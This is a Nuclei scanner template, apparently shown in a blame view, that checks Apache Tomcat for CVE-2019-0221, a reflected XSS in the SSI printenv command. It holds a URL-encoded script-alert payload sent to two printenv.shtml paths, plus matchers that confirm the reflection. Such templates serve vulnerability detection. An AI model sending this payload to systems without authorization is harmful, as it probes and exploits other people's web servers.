nuclei-templates/cves/2019/CVE-2019-0221.yaml

44 lines
1.3 KiB
YAML
Raw Normal View History

2021-03-05 14:38:39 +00:00
id: CVE-2019-0221
info:
name: Apache Tomcat XSS
author: pikpikcu
severity: medium
2021-03-05 14:38:39 +00:00
description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
therefore, vulnerable to XSS. SSI is disabled by default.
The printenv command is intended for debugging and is unlikely to be present in a production website.
reference:
- https://seclists.org/fulldisclosure/2019/May/50
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-0221
cwe-id: CWE-79
tags: cve,cve2019,apache,xss,tomcat
2021-03-05 14:38:39 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
2021-08-01 02:43:53 +00:00
- "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
2021-03-05 14:38:39 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('xss')</script>"
2021-03-06 05:58:28 +00:00
- type: word
part: header
2021-03-06 05:58:28 +00:00
words:
- "text/html"
2021-03-05 14:38:39 +00:00
- type: status
status:
- 200